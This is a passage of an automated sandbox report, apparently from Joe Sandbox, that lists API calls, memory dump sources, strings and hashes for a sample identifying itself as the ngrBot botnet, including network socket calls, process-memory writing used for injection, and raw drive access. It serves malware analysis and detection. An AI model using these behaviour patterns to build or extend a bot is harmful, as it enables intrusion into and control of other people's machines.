                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 00408004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 0040803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00408081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 0040809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 00362A44
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00362A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 00362A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 00362A9B
                                                                    • Part of subcall function 003624A0: GetProcessHeap.KERNEL32(00000000,?,00362131,00000000), ref: 003624B4
                                                                    • Part of subcall function 003624A0: HeapFree.KERNEL32(?,00000000,1!6), ref: 003624C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 00362AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00362AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 00362B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00367FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 00367FFB
                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 00368004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 0036803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00368081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 0036809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  APIs
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0040AFBD
                                                                    • Part of subcall function 0040AFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 0040AFCB
                                                                    • Part of subcall function 0040AFA0: memset.MSVCRT ref: 0040AFE8
                                                                    • Part of subcall function 0040AFA0: memset.MSVCRT ref: 0040B002
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(?), ref: 0040B013
                                                                    • Part of subcall function 0040AFA0: sscanf.MSVCRT ref: 0040B02A
                                                                    • Part of subcall function 0040AFA0: strtok.MSVCRT ref: 0040B041
                                                                    • Part of subcall function 0040AFA0: _memicmp.MSVCRT ref: 0040B05B
                                                                    • Part of subcall function 0040AFA0: strtok.MSVCRT ref: 0040B06E
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B09B
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0AD
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0BB
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0C6
                                                                    • Part of subcall function 0040AFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 0040B0D5
                                                                    • Part of subcall function 0040AFA0: _memicmp.MSVCRT ref: 0040B0EB
                                                                  • strstr.MSVCRT ref: 00406EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00406EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 00406EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00406F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00406F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00406F3C
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(00406E9C,00000000,00000000,00000000,?,?,00406E9C), ref: 0040B178
                                                                    • Part of subcall function 0040B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00406E9C), ref: 0040B186
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(00406E9C,?,?,00406E9C), ref: 0040B18F
                                                                    • Part of subcall function 0040B160: strstr.MSVCRT ref: 0040B19F
                                                                    • Part of subcall function 0040B160: strstr.MSVCRT ref: 0040B1B6
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1C3
                                                                    • Part of subcall function 0040B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00406E9C), ref: 0040B1D2
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1DC
                                                                    • Part of subcall function 0040B160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00406E9C), ref: 0040B1E5
                                                                    • Part of subcall function 0040B160: HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B1F8
                                                                    • Part of subcall function 004101E0: memset.MSVCRT ref: 00410202
                                                                    • Part of subcall function 004101E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410213
                                                                    • Part of subcall function 004101E0: EnterCriticalSection.KERNEL32(0044B4E4), ref: 00410223
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 00410243
                                                                    • Part of subcall function 004101E0: lstrlenA.KERNEL32(00000000), ref: 00410254
                                                                    • Part of subcall function 004101E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0041025F
                                                                    • Part of subcall function 004101E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 00410272
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 00410281
                                                                    • Part of subcall function 004101E0: _snprintf.MSVCRT ref: 004102C8
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 004102EF
                                                                    • Part of subcall function 004101E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  APIs
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0036AFBD
                                                                    • Part of subcall function 0036AFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 0036AFCB
                                                                    • Part of subcall function 0036AFA0: memset.MSVCRT ref: 0036AFE8
                                                                    • Part of subcall function 0036AFA0: memset.MSVCRT ref: 0036B002
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(?), ref: 0036B013
                                                                    • Part of subcall function 0036AFA0: sscanf.MSVCRT ref: 0036B02A
                                                                    • Part of subcall function 0036AFA0: strtok.MSVCRT ref: 0036B041
                                                                    • Part of subcall function 0036AFA0: _memicmp.MSVCRT ref: 0036B05B
                                                                    • Part of subcall function 0036AFA0: strtok.MSVCRT ref: 0036B06E
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B09B
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0AD
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0BB
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0C6
                                                                    • Part of subcall function 0036AFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 0036B0D5
                                                                    • Part of subcall function 0036AFA0: _memicmp.MSVCRT ref: 0036B0EB
                                                                  • strstr.MSVCRT ref: 00366EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00366EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 00366EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00366F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00366F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00366F3C
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(00366E9C,00000000,00000000,00000000,?,?,00366E9C), ref: 0036B178
                                                                    • Part of subcall function 0036B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00366E9C), ref: 0036B186
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(00366E9C,?,?,00366E9C), ref: 0036B18F
                                                                    • Part of subcall function 0036B160: strstr.MSVCRT ref: 0036B19F
                                                                    • Part of subcall function 0036B160: strstr.MSVCRT ref: 0036B1B6
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1C3
                                                                    • Part of subcall function 0036B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00366E9C), ref: 0036B1D2
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1DC
                                                                    • Part of subcall function 0036B160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00366E9C), ref: 0036B1E5
                                                                    • Part of subcall function 0036B160: HeapFree.KERNEL32(?,00000000,00000000), ref: 0036B1F8
                                                                    • Part of subcall function 003701E0: memset.MSVCRT ref: 00370202
                                                                    • Part of subcall function 003701E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370213
                                                                    • Part of subcall function 003701E0: EnterCriticalSection.KERNEL32(003AB4E4), ref: 00370223
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 00370243
                                                                    • Part of subcall function 003701E0: lstrlenA.KERNEL32(00000000), ref: 00370254
                                                                    • Part of subcall function 003701E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0037025F
                                                                    • Part of subcall function 003701E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 00370272
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 00370281
                                                                    • Part of subcall function 003701E0: _snprintf.MSVCRT ref: 003702C8
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 003702EF
                                                                    • Part of subcall function 003701E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  • Opcode ID: 93fc480bebc7651962fa53b0848c1850a07d408aae686603389932aa27244205
                                                                  • Instruction ID: 692bf602b77452e45e56455239784907bdf79fb597ec5bdc72c3686b25fffd5b
                                                                  • Opcode Fuzzy Hash: 93fc480bebc7651962fa53b0848c1850a07d408aae686603389932aa27244205
                                                                  • Instruction Fuzzy Hash: AB31D776900204BBCB13DFA5EC86EAF77ACEB85350F158025F9089B205DB75ED50CBA1
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32 ref: 00402FD2
                                                                  • WriteProcessMemory.KERNEL32 ref: 0040301C
                                                                  • WriteProcessMemory.KERNEL32 ref: 00403036
                                                                  • WriteProcessMemory.KERNEL32 ref: 00403053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID: $g\@
                                                                  • API String ID: 2454571318-100232733
                                                                  • Opcode ID: afba040f6b78dad9a64a69251b00c2452e7616e1452184dac7652ca053b11117
                                                                  • Instruction ID: df94579fe5779622c4b9a2bbeb87517a31d4cf809518c5bbba1c78cdbb14ede0
                                                                  • Opcode Fuzzy Hash: afba040f6b78dad9a64a69251b00c2452e7616e1452184dac7652ca053b11117
                                                                  • Instruction Fuzzy Hash: D2318DB2A0150DAADB10DE99DC80EEFB77CEB40751F10412AEA04E6288E775AF45C7A4
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32 ref: 00362FD2
                                                                  • WriteProcessMemory.KERNEL32 ref: 0036301C
                                                                  • WriteProcessMemory.KERNEL32 ref: 00363036
                                                                  • WriteProcessMemory.KERNEL32 ref: 00363053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID: $g\6
                                                                  • API String ID: 2454571318-3164584468
                                                                  • Opcode ID: fbc36e80b39263f23166b25f1eac621fefa91bc6881c44d4a3bae4a84a3715ab
                                                                  • Instruction ID: 84734083bfb273db3e7a8ac7c4cab37bed24fa0fdcfca4f0956b73c29d8026c3
                                                                  • Opcode Fuzzy Hash: fbc36e80b39263f23166b25f1eac621fefa91bc6881c44d4a3bae4a84a3715ab
                                                                  • Instruction Fuzzy Hash: BA316DB260050DAADB12DE99DC80EEFB37CEB41750F118165F90696148E771AF59C7A0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: 9443ea1a6c34d4dd27128972ab46630562f1943a0569a7d966f0aeca5586478e
                                                                  • Instruction ID: e19f26a57a8d371ee74b48060b1fbe9b9ea883c41348451d97a1bc845706ce98
                                                                  • Opcode Fuzzy Hash: 9443ea1a6c34d4dd27128972ab46630562f1943a0569a7d966f0aeca5586478e
                                                                  • Instruction Fuzzy Hash: 57310475900206BBE7209B69CC89FA77B6CEF44344F044179B909A7282EA74ED45C7B4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: 5f2657c2eebf678fad5feb3b2ec57f8f0d5dcc65ead0421a3bf29b19ca24837d
                                                                  • Instruction ID: 81572c47e5d9c0ca1cd067c298147256335ca1e14ed6469cb3339240b821c915
                                                                  • Opcode Fuzzy Hash: 5f2657c2eebf678fad5feb3b2ec57f8f0d5dcc65ead0421a3bf29b19ca24837d
                                                                  • Instruction Fuzzy Hash: FE3108B5A00206BBE7219B28CCC9FA7776CEF44340F048164F8099B146E770ED45CBB0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: 23ec7fce3546beb37acd49c2d85190782378fbd514bc716e8a0b894e0436e7ca
                                                                  • Instruction ID: 788de98c1237337ff7e2880e90b2af97be5818e55d19a1934294188661e30183
                                                                  • Opcode Fuzzy Hash: 23ec7fce3546beb37acd49c2d85190782378fbd514bc716e8a0b894e0436e7ca
                                                                  • Instruction Fuzzy Hash: 08212B72B002186BD7209F69ECC5FE77358EB44714F04497AFD19E3241E675D94087E5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: 7780d8fd73e9fa098c450c1724e9cc2d417a221c408d73ef63077e79ae802981
                                                                  • Instruction ID: aa1474777e4f76f2a505ad83bf3dbf6cf5e348f58b39094bb370b8cdb8132549
                                                                  • Opcode Fuzzy Hash: 7780d8fd73e9fa098c450c1724e9cc2d417a221c408d73ef63077e79ae802981
                                                                  • Instruction Fuzzy Hash: 82210333600218ABEB329E6CEC84FE7736CEB44714F848569FD1CD7105E670990087E0
                                                                  APIs
                                                                    • Part of subcall function 00363810: GetProcessHeap.KERNEL32(00000000,00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363819
                                                                    • Part of subcall function 00363810: HeapAlloc.KERNEL32(00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363820
                                                                  • sprintf.MSVCRT ref: 0036F2E9
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0036F2FA
                                                                  • memset.MSVCRT ref: 0036F323
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,003709A7,0000000C,?,00000400,00000000,00000000), ref: 0036F352
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036F35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 2995886503-1260769427
                                                                  • Opcode ID: 5325013f763f17556db8bd5bc0ac033215bf5d12ea737fe2390fd52abcbe3d61
                                                                  • Instruction ID: bfaebc873294c7f5f93ad6f6afdcf5390d71df61640c89358df370111cfb1208
                                                                  • Opcode Fuzzy Hash: 5325013f763f17556db8bd5bc0ac033215bf5d12ea737fe2390fd52abcbe3d61
                                                                  • Instruction Fuzzy Hash: D02195F19002087FE721DF989CC5EFEB77CEB45754F104579F608A6281E6B40F844AA1
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004081E3
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004081F9
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040820F
                                                                  • closesocket.WS2_32(00000000), ref: 0040821A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Startupclosesocketioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3235567692-0
                                                                  • Opcode ID: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction ID: 2b0dcf704551c650d29533d06b19cfcaca382403250199c2a733ecaf4d854171
                                                                  • Opcode Fuzzy Hash: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction Fuzzy Hash: 0301D67164031875EA20E6A59D07FFE725CCF05728F0006AAFB18BA1C1EBF95AD542DD
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 003681E3
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003681F9
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0036820F
                                                                  • closesocket.WS2_32(00000000), ref: 0036821A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Startupclosesocketioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3235567692-0
                                                                  • Opcode ID: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction ID: 16254396924809651beff1ea8a6a145b19e0e2e1edd266c2eefe6412e20f4643
                                                                  • Opcode Fuzzy Hash: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction Fuzzy Hash: CD012231640A18B5EA32E6A48C03FFE725CCF09720F008BA4FB1CAE4C1EBF54A048395
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040E750,00000000,00000000,00000000), ref: 0040A659
                                                                  • MessageBoxA.USER32 ref: 0040A66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A678
                                                                  • ExitProcess.KERNEL32 ref: 0040A680
                                                                  Strings
                                                                  • ngrBot Error, xrefs: 0040A661
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 0040A666
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: ef5e2cb8f22fc0210164a191ddb43d318e3842e5a1d98e74102cfaaa7881f373
                                                                  • Instruction ID: dc0d325c1072b72e0d8e59aa08d1cae9c16ec156ffef70dd10597c0366fd65a5
                                                                  • Opcode Fuzzy Hash: ef5e2cb8f22fc0210164a191ddb43d318e3842e5a1d98e74102cfaaa7881f373
                                                                  • Instruction Fuzzy Hash: 22E06735BC5351B7E62017A05D0BFC429249B08F52F218661B315FE4E0C6E42190475D
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036E750,00000000,00000000,00000000), ref: 0036A659
                                                                  • MessageBoxA.USER32 ref: 0036A66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036A678
                                                                  • ExitProcess.KERNEL32 ref: 0036A680
                                                                  Strings
                                                                  • ngrBot Error, xrefs: 0036A661
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 0036A666
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: 319ebe08d38caa3c9c798332a554056912fb04d0de90b7bdefe213ae71aa081d
                                                                  • Instruction ID: 63999540bd792ed753e1420c3cb228ac651cae3c2a7ec816526a9610de55d4c6
                                                                  • Opcode Fuzzy Hash: 319ebe08d38caa3c9c798332a554056912fb04d0de90b7bdefe213ae71aa081d
                                                                  • Instruction Fuzzy Hash: C5E09E367D4351B7E67317A45D0FFC536589B04F12F214600F32DBD0D49AD421C04759
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: 7dd372d5851a64b1621396c9dfdd56531f0907fab683194608e6fb6fd50729dd
                                                                  • Instruction ID: 5826c9583f370a1dd932e8f72a1f935f9ca8b57465acbcc929005ef802fb48eb
                                                                  • Opcode Fuzzy Hash: 7dd372d5851a64b1621396c9dfdd56531f0907fab683194608e6fb6fd50729dd
                                                                  • Instruction Fuzzy Hash: 3B114CB2A4031937F720E6698C86FF7736CDF84700F0405BDBE1853182E5B49E4087A4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: bcf893b7db30a069d51f0e2843565e782ef5ea78ce021f5905103030c7406fc5
                                                                  • Instruction ID: b96222c4dd8e47ac36bac6709cde971cd6a4a41b79cfb9425b0dadd1a0c0cac7
                                                                  • Opcode Fuzzy Hash: bcf893b7db30a069d51f0e2843565e782ef5ea78ce021f5905103030c7406fc5
                                                                  • Instruction Fuzzy Hash: DB112F7694031977E731E6589C86FF7736CDF84750F0445A8F91C6B281E5B49E0087E0
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004102C8
                                                                  • strstr.MSVCRT ref: 004102EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00410322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103EE
                                                                  • LeaveCriticalSection.KERNEL32(0044B4E4), ref: 004103FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041041F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: ee71abe191ac5c5f67e6a76e53e66d7266845c4f9d38bb18f3292e0e6c04068d
                                                                  • Instruction ID: 18d3edc493bc3f403bf92720d977da1dbff54a17adae19d127435001e8f83a82
                                                                  • Opcode Fuzzy Hash: ee71abe191ac5c5f67e6a76e53e66d7266845c4f9d38bb18f3292e0e6c04068d
                                                                  • Instruction Fuzzy Hash: CC11A971A4031DABDB209751CC81BFBB378EB84305F14416BEE1963240DAB8FDC18BA9
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003702C8
